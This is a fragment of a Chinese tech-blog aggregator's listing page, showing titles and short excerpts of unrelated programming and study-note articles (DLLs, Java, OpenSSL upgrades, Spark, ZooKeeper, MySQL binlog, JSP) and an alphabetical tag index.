                           title="动态链接库(Dynamic Link Library)学习笔记" target="_blank">动态链接库(Dynamic Link Library)学习笔记</a>
                        <span class="text-muted">peixian2003</span>
<a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B/1.htm">编程</a>
                        <div>经常忘记http://blog.csdn.net/yxin1322/article/details/638156动态链接库(DynamicLinkLibrary)学习笔记作者：yxin1322blog：http://blog.csdn.net/yxin1322转载请注明出处我对动态链接和动态链接库的概念并不陌，但一直以来就停留在概念的层面上，没有更深入的了解。今天抽空看了一下有关动态链接和动态链接</div>
                    </li>
                    <li><a href="/article/1949759807007289344.htm"
                           title="2022-10-28晨间日记" target="_blank">2022-10-28晨间日记</a>
                        <span class="text-muted">明心279</span>

                        <div>今天是什么日子起床：6.00就寝：天气：多云心情：开心纪念日：任务清单昨日完成的任务，最重要的三件事：改进：习惯养成：周目标·完成进度学习·信息·阅读八字笔记整理紫微斗数学习笔记健康·饮食·锻炼耳功八法81站桩35早上小米醪糟汤圆荷包蛋中午馒头蔬菜汤晚上煮泡面人际·家人·朋友工作·思考最美好的三件事1.我是最善良，最可爱，最大度，最宽容，最仁慈，最宽厚，最有魅力的优雅知性女子。我每天都很开心，都很</div>
                    </li>
                    <li><a href="/article/1949720150290788352.htm"
                           title="高级07-Java安全编程：保护你的应用免受攻击" target="_blank">高级07-Java安全编程：保护你的应用免受攻击</a>
                        <span class="text-muted">Jinkxs</span>
<a class="tag" taget="_blank" href="/search/Java%E9%AB%98%E7%BA%A7%E7%AF%87/1.htm">Java高级篇</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>引言在当今的数字时代，应用程序的安全性已成为软件开发过程中不可忽视的重要环节。Java作为一门广泛应用于企业级应用开发的编程语言，其安全性问题尤其受到关注。无论是在Web应用、移动应用还是后端服务中，Java开发者都需要面对各种潜在的安全威胁，如SQL注入、跨站脚本攻击（XSS）、跨站请求伪造（CSRF）、身份验证漏洞等。因此，掌握Java安全编程的最佳实践，不仅能够提升应用程序的健壮性，还能有效</div>
                    </li>
                    <li><a href="/article/1949710319857233920.htm"
                           title="java23种设计模式-外观模式" target="_blank">java23种设计模式-外观模式</a>
                        <span class="text-muted">千里码！</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/%E5%A4%96%E8%A7%82%E6%A8%A1%E5%BC%8F/1.htm">外观模式</a>
                        <div>外观模式（FacadePattern）学习笔记定义外观模式属于结构型设计模式，提供一个统一的接口来访问子系统中的多个接口。它通过定义一个高层接口简化客户端与复杂子系统的交互。适用场景为复杂子系统提供简单入口解耦客户端与子系统分层构建系统（各层通过外观类交互）遗留系统重构（用外观类封装旧接口）模式结构类图ClientFacade-subsystemA:SubsystemA-subsystemB:Su</div>
                    </li>
                    <li><a href="/article/1949675764353921024.htm"
                           title="宝塔开放php openssl,[教程]Centos宝塔面板升级openssl增强nginxSSL安全性，openssl开启Http/2,Centos升级openssl..." target="_blank">宝塔开放php openssl,[教程]Centos宝塔面板升级openssl增强nginxSSL安全性，openssl开启Http/2,Centos升级openssl...</a>
                        <span class="text-muted">weixin_39956353</span>
<a class="tag" taget="_blank" href="/search/%E5%AE%9D%E5%A1%94%E5%BC%80%E6%94%BEphp/1.htm">宝塔开放php</a><a class="tag" taget="_blank" href="/search/openssl/1.htm">openssl</a>
                        <div>由于本站是采用的Centos7+宝塔面板搭建的LNMP环境，但是Centos7默认的openssl版本又太低，根据“漏洞参考这里：https://www.trustasia.com/OpenSSL-CVE-2016-2107-Padding-Oracle”查看这篇文章发现openssl低版本已经有一堆漏洞了，所以就萌生了升级openssl版本的想法。配置完后如图：openssl版本低会导致无论你怎</div>
                    </li>
                    <li><a href="/article/1949646271916601344.htm"
                           title="语言合成模型Spark-TTS-0.5B学习笔记" target="_blank">语言合成模型Spark-TTS-0.5B学习笔记</a>
                        <span class="text-muted">tutgxuzyj</span>
<a class="tag" taget="_blank" href="/search/spark/1.htm">spark</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
                        <div>语言合成模型Spark-TTS-0.5B学习笔记语言合成是通过计算机技术将文字信息转换为自然流畅的语音输出，模拟人类语音。一、下载Spark-TTS-0.5B项目下载链接：https://github.com/SparkAudio/Spark-TTS.git注：需要科学网络。进入Spark-TTS文件夹，启动命令行窗口。创建Conda环境：condacreate-nsparktts-ypython</div>
                    </li>
                    <li><a href="/article/1949646145076654080.htm"
                           title="编程与数学 03-002 计算机网络 10_应用层协议" target="_blank">编程与数学 03-002 计算机网络 10_应用层协议</a>
                        <span class="text-muted">明月看潮生</span>
<a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B%E4%B8%8E%E6%95%B0%E5%AD%A6/1.htm">编程与数学</a><a class="tag" taget="_blank" href="/search/%E7%AC%AC03%E9%98%B6%E6%AE%B5/1.htm">第03阶段</a><a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/1.htm">计算机网络</a><a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B%E4%B8%8E%E6%95%B0%E5%AD%A6/1.htm">编程与数学</a><a class="tag" taget="_blank" href="/search/%E9%9D%92%E5%B0%91%E5%B9%B4%E7%BC%96%E7%A8%8B/1.htm">青少年编程</a>
                        <div>编程与数学03-002计算机网络10_应用层协议一、常见的网络应用（一）Web应用（二）电子邮件（三）文件传输二、Web应用协议（HTTP/HTTPS）（一）HTTP协议的请求与响应格式（二）HTTPS的安全机制三、电子邮件协议（SMTP、POP3、IMAP）（一）邮件发送与接收的协议工作原理（二）各协议的功能特点四、总结摘要：本文是计算机网络课程中关于应用层协议的学习笔记。应用层协议是计算机网络</div>
                    </li>
                    <li><a href="/article/1949642741373792256.htm"
                           title="泷羽sec专题课笔记-- Linux作业--开机自启动方法以及破解" target="_blank">泷羽sec专题课笔记-- Linux作业--开机自启动方法以及破解</a>
                        <span class="text-muted">grrrr_1</span>
<a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a>
                        <div>本笔记为泷羽sec《红队全栈课程》学习笔记，课程请可自行前往B站学习，课程/笔记主要涉及网络安全相关知识、系统以及工具的介绍等，请使用该课程、本笔记以及课程和笔记中提及工具的读者，遵守网络安全相关法律法规，切勿进行违法违规违纪的操作。写在最前面的话，我们为什么要学习网络安全这门技术：维护国家安全防范网络攻击：网络安全威胁已成为国家安全的重要挑战。学习网络安全有助于识别和防范来自国内外的网络攻击，防</div>
                    </li>
                    <li><a href="/article/1949636437980803072.htm"
                           title="编程与数学 03-002 计算机网络 07_路由算法" target="_blank">编程与数学 03-002 计算机网络 07_路由算法</a>
                        <span class="text-muted">明月看潮生</span>
<a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B%E4%B8%8E%E6%95%B0%E5%AD%A6/1.htm">编程与数学</a><a class="tag" taget="_blank" href="/search/%E7%AC%AC03%E9%98%B6%E6%AE%B5/1.htm">第03阶段</a><a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/1.htm">计算机网络</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/%E6%99%BA%E8%83%BD%E8%B7%AF%E7%94%B1%E5%99%A8/1.htm">智能路由器</a><a class="tag" taget="_blank" href="/search/%E9%9D%92%E5%B0%91%E5%B9%B4%E7%BC%96%E7%A8%8B/1.htm">青少年编程</a><a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B%E4%B8%8E%E6%95%B0%E5%AD%A6/1.htm">编程与数学</a>
                        <div>编程与数学03-002计算机网络07_路由算法一、静态路由算法（一）手工配置路由表的方法（二）静态路由的优缺点二、动态路由算法原理（一）距离矢量算法（如贝尔曼-福特算法）（二）链路状态算法（如迪杰斯特拉算法）三、路由算法的性能比较（一）收敛速度（二）开销（三）适用场景四、总结摘要：本文是计算机网络课程中关于路由算法的学习笔记。路由算法是网络层的重要组成部分，用于选择最佳路径将数据包从源节点传输到目</div>
                    </li>
                                <li><a href="/article/13.htm"
                                       title="github中多个平台共存" target="_blank">github中多个平台共存</a>
                                    <span class="text-muted">jackyrong</span>
<a class="tag" taget="_blank" href="/search/github/1.htm">github</a>
                                    <div>在个人电脑上，如何分别链接比如oschina,github等库呢，一般教程之列的，默认 
ssh链接一个托管的而已，下面讲解如何放两个文件 
 
 
1） 设置用户名和邮件地址 
 
$ git config --global user.name &quot;xx&quot; 
 
$ git config --global user.email &quot;test@gmail.com&quot</div>
                                </li>
                                <li><a href="/article/140.htm"
                                       title="ip地址与整数的相互转换(javascript)" target="_blank">ip地址与整数的相互转换(javascript)</a>
                                    <span class="text-muted">alxw4616</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a>
                                    <div>//IP转成整型
function ip2int(ip){
    var num = 0;
    ip = ip.split(&quot;.&quot;);
    num = Number(ip[0]) * 256 * 256 * 256 + Number(ip[1]) * 256 * 256 + Number(ip[2]) * 256 + Number(ip[3]);
    n</div>
                                </li>
                                <li><a href="/article/267.htm"
                                       title="读书笔记-jquey+数据库+css" target="_blank">读书笔记-jquey+数据库+css</a>
                                    <span class="text-muted">chengxuyuancsdn</span>
<a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a><a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a>
                                    <div>1、grouping ,group by rollup, GROUP BY GROUPING SETS区别 
2、$(&quot;#totalTable tbody&gt;tr td:nth-child(&quot; + i + &quot;)&quot;).css({&quot;width&quot;:tdWidth, &quot;margin&quot;:&quot;0px&quot;, &q</div>
                                </li>
                                <li><a href="/article/394.htm"
                                       title="javaSE javaEE javaME == API下载" target="_blank">javaSE javaEE javaME == API下载</a>
                                    <span class="text-muted">Array_06</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>oracle下载各种API文档： 
http://www.oracle.com/technetwork/java/embedded/javame/embed-me/documentation/javame-embedded-apis-2181154.html 
 
JavaSE文档： 
http://docs.oracle.com/javase/8/docs/api/ 
JavaEE文档： 
ht</div>
                                </li>
                                <li><a href="/article/521.htm"
                                       title="shiro入门学习" target="_blank">shiro入门学习</a>
                                    <span class="text-muted">cugfy</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/%E6%A1%86%E6%9E%B6/1.htm">框架</a>
                                    <div>声明本文只适合初学者，本人也是刚接触而已，经过一段时间的研究小有收获，特来分享下希望和大家互相交流学习。 
首先配置我们的web.xml代码如下，固定格式，记死就成 
 &lt;filter&gt; 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;filter-name&gt;shiroFilter&lt;/filter-name&gt; 
&nbs</div>
                                </li>
                                <li><a href="/article/648.htm"
                                       title="Array添加删除方法" target="_blank">Array添加删除方法</a>
                                    <span class="text-muted">357029540</span>
<a class="tag" taget="_blank" href="/search/js/1.htm">js</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp; 刚才做项目前台删除数组的固定下标值时，删除得不是很完整，所以在网上查了下，发现一个不错的方法，也提供给需要的同学。 
 
//给数组添加删除 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Array.prototype.del = function(n){ 
</div>
                                </li>
                                <li><a href="/article/775.htm"
                                       title="navigation bar 更改颜色" target="_blank">navigation bar 更改颜色</a>
                                    <span class="text-muted">张亚雄</span>
<a class="tag" taget="_blank" href="/search/IO/1.htm">IO</a>
                                    <div>今天郁闷了一下午，就因为objective-c默认语言是英文，我写的中文全是一些乱七八糟的样子，到不是乱码，但是，前两个自字是粗体，后两个字正常体，这可郁闷死我了，问了问大牛，人家告诉我说更改一下字体就好啦，比如改成黑体，哇塞，茅塞顿开。 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 翻书看，发现，书上有介绍怎么更改表格中文字字体的，代码如下 
&nbsp;&nbsp;&nbsp</div>
                                </li>
                                <li><a href="/article/902.htm"
                                       title="unicode转换成中文" target="_blank">unicode转换成中文</a>
                                    <span class="text-muted">adminjun</span>
<a class="tag" taget="_blank" href="/search/unicode/1.htm">unicode</a><a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A0%81%E8%BD%AC%E6%8D%A2/1.htm">编码转换</a>
                                    <div>&nbsp; 
在Java程序中总会出现\u6b22\u8fce\u63d0\u4ea4\u5fae\u535a\u641c\u7d22\u4f7f\u7528\u53cd\u9988\uff0c\u8bf7\u76f4\u63a5这个的字符，这是unicode编码，使用时有时候不会自动转换成中文就需要自己转换了使用下面的方法转换一下即可。 
	/**
	 * unicode 转换成 中文
	</div>
                                </li>
                                <li><a href="/article/1029.htm"
                                       title="一站式 Java Web 框架 firefly" target="_blank">一站式 Java Web 框架 firefly</a>
                                    <span class="text-muted">aijuans</span>
<a class="tag" taget="_blank" href="/search/Java+Web/1.htm">Java Web</a>
                                    <div>Firefly是一个高性能一站式Web框架。 涵盖了web开发的主要技术栈。 包含Template engine、IOC、MVC framework、HTTP Server、Common tools、Log、Json parser等模块。 
firefly-2.0_07修复了模版压缩对javascript单行注释的影响，并新增了自定义错误页面功能。 
更新日志： 
 
 增加自定义系统错误页面功能</div>
                                </li>
                                <li><a href="/article/1156.htm"
                                       title="设计模式——单例模式" target="_blank">设计模式——单例模式</a>
                                    <span class="text-muted">ayaoxinchao</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a>
                                    <div>定义 
&nbsp; 
&nbsp; &nbsp; &nbsp; &nbsp;Java中单例模式定义：“一个类有且仅有一个实例，并且自行实例化向整个系统提供。” 
&nbsp; 
分析 
&nbsp; 
&nbsp; &nbsp; &nbsp; &nbsp;从定义中可以看出单例的要点有三个：一是某个类只能有一个实例；二是必须自行创建这个实例；三是必须自行向系统提供这个实例。 
&nbsp; &nb</div>
                                </li>
                                <li><a href="/article/1283.htm"
                                       title="Javascript 多浏览器兼容性问题及解决方案" target="_blank">Javascript 多浏览器兼容性问题及解决方案</a>
                                    <span class="text-muted">BigBird2012</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a>
                                    <div>不论是网站应用还是学习js,大家很注重ie与firefox等浏览器的兼容性问题，毕竟这两中浏览器是占了绝大多数。 
一、document.formName.item(”itemName”) 问题  
问题说明：IE下，可以使用 document.formName.item(”itemName”) 或 document.formName.elements [&quot;elementName&quo</div>
                                </li>
                                <li><a href="/article/1410.htm"
                                       title="JUnit-4.11使用报java.lang.NoClassDefFoundError: org/hamcrest/SelfDescribing错误" target="_blank">JUnit-4.11使用报java.lang.NoClassDefFoundError: org/hamcrest/SelfDescribing错误</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/junit4.11/1.htm">junit4.11</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E5%85%83%E6%B5%8B%E8%AF%95/1.htm">单元测试</a>
                                    <div>&nbsp; &nbsp; &nbsp; &nbsp; 下载了最新的JUnit版本，是4.11，结果尝试使用发现总是报java.lang.NoClassDefFoundError: org/hamcrest/SelfDescribing这样的错误，上网查了一下，一般的解决方案是，换一个低一点的版本就好了。还有人说，是缺少hamcrest的包。去官网看了一下，如下发现： 
&nbsp; &nbsp;</div>
                                </li>
                                <li><a href="/article/1537.htm"
                                       title="[Zookeeper学习笔记之二]Zookeeper部署脚本" target="_blank">[Zookeeper学习笔记之二]Zookeeper部署脚本</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/zookeeper/1.htm">zookeeper</a>
                                    <div>Zookeeper伪分布式安装脚本(此脚本在一台机器上创建Zookeeper三个进程，即创建具有三个节点的Zookeeper集群。这个脚本和zookeeper的tar包放在同一个目录下，脚本中指定的名字是zookeeper的3.4.6版本，需要根据实际情况修改)： 
&nbsp; 
#!/bin/bash  
  
#!!!Change the name!!!  
#The zookeepe</div>
                                </li>
                                <li><a href="/article/1664.htm"
                                       title="【Spark八十】Spark RDD API二" target="_blank">【Spark八十】Spark RDD API二</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/spark/1.htm">spark</a>
                                    <div>coGroup 
package spark.examples.rddapi

import org.apache.spark.{SparkConf, SparkContext}
import org.apache.spark.SparkContext._

object CoGroupTest_05 {
  def main(args: Array[String]) {
    v</div>
                                </li>
                                <li><a href="/article/1791.htm"
                                       title="Linux中编译apache服务器modules文件夹缺少模块(.so)的问题" target="_blank">Linux中编译apache服务器modules文件夹缺少模块(.so)的问题</a>
                                    <span class="text-muted">ronin47</span>
<a class="tag" taget="_blank" href="/search/modules/1.htm">modules</a>
                                    <div>在modules目录中只有httpd.exp，那些so文件呢？ 
 
我尝试在fedora core 3中安装apache 2. 当我解压了apache 2.0.54后使用configure工具并且加入了 --enable-so 或者 --enable-modules=so (两个我都试过了) 
去make并且make install了。我希望在/apache2/modules/目录里有各种模块，</div>
                                </li>
                                <li><a href="/article/1918.htm"
                                       title="Java基础-克隆" target="_blank">Java基础-克隆</a>
                                    <span class="text-muted">BrokenDreams</span>
<a class="tag" taget="_blank" href="/search/java%E5%9F%BA%E7%A1%80/1.htm">java基础</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Java中怎么拷贝一个对象呢？可以通过调用这个对象类型的构造器构造一个新对象，然后将要拷贝对象的属性设置到新对象里面。Java中也有另一种不通过构造器来拷贝对象的方式，这种方式称为 
克隆。 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Java提供了java.lang.</div>
                                </li>
                                <li><a href="/article/2045.htm"
                                       title="读《研磨设计模式》-代码笔记-适配器模式-Adapter" target="_blank">读《研磨设计模式》-代码笔记-适配器模式-Adapter</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a>
                                    <div>声明： 本文只为方便我个人查阅和理解，详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ 
 
 
package design.pattern;

/*
 * 适配器模式解决的主要问题是，现有的方法接口与客户要求的方法接口不一致
 * 可以这样想，我们要写这样一个类（Adapter）:
 * 1.这个类要符合客户的要求 ---&gt; 那显然要</div>
                                </li>
                                <li><a href="/article/2172.htm"
                                       title="HDR图像PS教程集锦&心得" target="_blank">HDR图像PS教程集锦&心得</a>
                                    <span class="text-muted">cherishLC</span>
<a class="tag" taget="_blank" href="/search/PS/1.htm">PS</a>
                                    <div>HDR是指高动态范围的图像，主要原理为提高图像的局部对比度。 
软件有photomatix和nik hdr efex。 
 一、教程 
叶明在知乎上的回答： 
http://www.zhihu.com/question/27418267/answer/37317792 
大意是修完后直方图最好是等值直方图，方法是HDR软件调一遍，再结合不透明度和蒙版细调。 
 
 二、心得 
 1、去除阴影部分的</div>
                                </li>
                                <li><a href="/article/2299.htm"
                                       title="maven-3.3.3 mvn archetype 列表" target="_blank">maven-3.3.3 mvn archetype 列表</a>
                                    <span class="text-muted">crabdave</span>
<a class="tag" taget="_blank" href="/search/ArcheType/1.htm">ArcheType</a>
                                    <div>maven-3.3.3&nbsp;mvn archetype 列表 
可以参考最新的：http://repo1.maven.org/maven2/archetype-catalog.xml 
&nbsp; 
[INFO] Scanning for projects... 
[INFO] &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </div>
                                </li>
                                <li><a href="/article/2426.htm"
                                       title="linux shell 中文件编码查看及转换方法" target="_blank">linux shell 中文件编码查看及转换方法</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/shell/1.htm">shell</a><a class="tag" taget="_blank" href="/search/%E4%B8%AD%E6%96%87%E4%B9%B1%E7%A0%81/1.htm">中文乱码</a><a class="tag" taget="_blank" href="/search/vim/1.htm">vim</a><a class="tag" taget="_blank" href="/search/%E6%96%87%E4%BB%B6%E7%BC%96%E7%A0%81/1.htm">文件编码</a>
                                    <div>一、查看文件编码。 
&nbsp;&nbsp;&nbsp; 在打开文件的时候输入:set fileencoding 
&nbsp;&nbsp;&nbsp; 即可显示文件编码格式。 
 
 
 
二、文件编码转换 
&nbsp;&nbsp;&nbsp; 1、在Vim中直接进行转换文件编码,比如将一个文件转换成utf-8格式 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&</div>
                                </li>
                                <li><a href="/article/2553.htm"
                                       title="MySQL--binlog日志恢复数据" target="_blank">MySQL--binlog日志恢复数据</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/binlog/1.htm">binlog</a>
                                    <div>   恢复数据的重要命令如下   mysql&gt; flush logs;  默认的日志是mysql-bin.000001，现在刷新了重新开启一个就多了一个mysql-bin.000002   &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</div>
                                </li>
                                <li><a href="/article/2680.htm"
                                       title="数据库中数据表数据迁移方法" target="_blank">数据库中数据表数据迁移方法</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a>
                                    <div>刚开始想想好像挺麻烦的，后来找到一种方法了，就SQL中的 INSERT 语句，不过内容是现从另外的表中查出来的，其实就是&nbsp;MySQL中INSERT INTO SELECT的使用 
&nbsp; 
下面看看如何使用 
&nbsp; 
语法：MySQL中INSERT INTO SELECT的使用 
1. 语法介绍 
&nbsp; &nbsp; &nbsp; 有三张表a、b、c，现在需要从表b</div>
                                </li>
                                <li><a href="/article/2807.htm"
                                       title="Java反转字符串" target="_blank">Java反转字符串</a>
                                    <span class="text-muted">dyy_gusi</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%8F%8D%E8%BD%AC%E5%AD%97%E7%AC%A6%E4%B8%B2/1.htm">反转字符串</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 前几天看见一篇文章，说使用Java能用几种方式反转一个字符串。首先要明白什么叫反转字符串，就是将一个字符串到过来啦，比如&quot;倒过来念的是小狗&quot;反转过来就是”狗小是的念来过倒“。接下来就把自己能想到的所有方式记录下来了。 
1、第一个念头就是直接使用String类的反转方法，对不起，这样是不行的，因为Stri</div>
                                </li>
                                <li><a href="/article/2934.htm"
                                       title="UI设计中我们为什么需要设计动效" target="_blank">UI设计中我们为什么需要设计动效</a>
                                    <span class="text-muted">gcq511120594</span>
<a class="tag" taget="_blank" href="/search/UI/1.htm">UI</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                                    <div>随着国际大品牌苹果和谷歌的引领，最近越来越多的国内公司开始关注动效设计了，越来越多的团队已经意识到动效在产品用户体验中的重要性了，更多的UI设计师们也开始投身动效设计领域。 
 
但是说到底，我们到底为什么需要动效设计？或者说我们到底需要什么样的动效？做动效设计也有段时间了，于是尝试用一些案例，从产品本身出发来说说我所思考的动效设计。 
 
一、加强体验舒适度 
 
嗯，就是让用户更加爽更加爽的用</div>
                                </li>
                                <li><a href="/article/3061.htm"
                                       title="JBOSS服务部署端口冲突问题" target="_blank">JBOSS服务部署端口冲突问题</a>
                                    <span class="text-muted">HogwartsRow</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%BA%94%E7%94%A8%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">应用服务器</a><a class="tag" taget="_blank" href="/search/jboss/1.htm">jboss</a><a class="tag" taget="_blank" href="/search/server/1.htm">server</a><a class="tag" taget="_blank" href="/search/EJB3/1.htm">EJB3</a>
                                    <div>服务端口冲突问题的解决方法，一般修改如下三个文件中的部分端口就可以了。 
&nbsp; 
1、jboss5/server/default/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml 
&nbsp; 
2、./server/default/deploy/jbossweb.sar/server.xml 
&nbsp; 
3、.</div>
                                </li>
                                <li><a href="/article/3188.htm"
                                       title="第三章 Redis/SSDB+Twemproxy安装与使用" target="_blank">第三章 Redis/SSDB+Twemproxy安装与使用</a>
                                    <span class="text-muted">jinnianshilongnian</span>
<a class="tag" taget="_blank" href="/search/ssdb/1.htm">ssdb</a><a class="tag" taget="_blank" href="/search/reids/1.htm">reids</a><a class="tag" taget="_blank" href="/search/twemproxy/1.htm">twemproxy</a>
                                    <div>目前对于互联网公司不使用Redis的很少，Redis不仅仅可以作为key-value缓存，而且提供了丰富的数据结果如set、list、map等，可以实现很多复杂的功能；但是Redis本身主要用作内存缓存，不适合做持久化存储，因此目前有如SSDB、ARDB等，还有如京东的JIMDB，它们都支持Redis协议，可以支持Redis客户端直接访问；而这些持久化存储大多数使用了如LevelDB、RocksD</div>
                                </li>
                                <li><a href="/article/3315.htm"
                                       title="ZooKeeper原理及使用 " target="_blank">ZooKeeper原理及使用 </a>
                                    <span class="text-muted">liyonghui160com</span>

                                    <div>&nbsp; 
&nbsp; 
&nbsp; &nbsp; &nbsp; &nbsp;ZooKeeper是Hadoop Ecosystem中非常重要的组件，它的主要功能是为分布式系统提供一致性协调(Coordination)服务，与之对应的Google的类似服务叫Chubby。今天这篇文章分为三个部分来介绍ZooKeeper，第一部分介绍ZooKeeper的基本原理，第二部分介绍ZooKeeper</div>
                                </li>
                                <li><a href="/article/3442.htm"
                                       title="程序员解决问题的60个策略" target="_blank">程序员解决问题的60个策略</a>
                                    <span class="text-muted">pda158</span>
<a class="tag" taget="_blank" href="/search/%E6%A1%86%E6%9E%B6/1.htm">框架</a><a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E5%85%83%E6%B5%8B%E8%AF%95/1.htm">单元测试</a>
                                    <div>根本的指导方针 
1. 首先写代码的时候最好不要有缺陷。最好的修复方法就是让 bug 胎死腹中。 
 
  良好的单元测试  
  强制数据库约束  
  使用输入验证框架  
  避免未实现的“else”条件  
  在应用到主程序之前知道如何在孤立的情况下使用  
 
&nbsp; 
日志 
2. print 语句。往往额外输出个一两行将有助于隔离问题。 
3. 切换至详细的日志记录。详细的日</div>
                                </li>
                                <li><a href="/article/3569.htm"
                                       title="Create the Google Play Account" target="_blank">Create the Google Play Account</a>
                                    <span class="text-muted">sillycat</span>
<a class="tag" taget="_blank" href="/search/Google/1.htm">Google</a>
                                    <div>Create the Google Play Account 
 
Having a Google account, pay 25$, then you get your google developer account. 
 
References: 
http://developer.android.com/distribute/googleplay/start.html 
https://p</div>
                                </li>
                                <li><a href="/article/3696.htm"
                                       title="JSP三大指令" target="_blank">JSP三大指令</a>
                                    <span class="text-muted">vikingwei</span>
<a class="tag" taget="_blank" href="/search/jsp/1.htm">jsp</a>
                                    <div>JSP三大指令 
&nbsp; 一个jsp页面中，可以有0~N个指令的定义！ 
1. page --&gt; 最复杂：&lt;%@page language=&quot;java&quot; info=&quot;xxx&quot;...%&gt; 
&nbsp; * pageEncoding和contentType： 
&nbsp;&nbsp;&nbsp; &gt; pageEncoding：它</div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
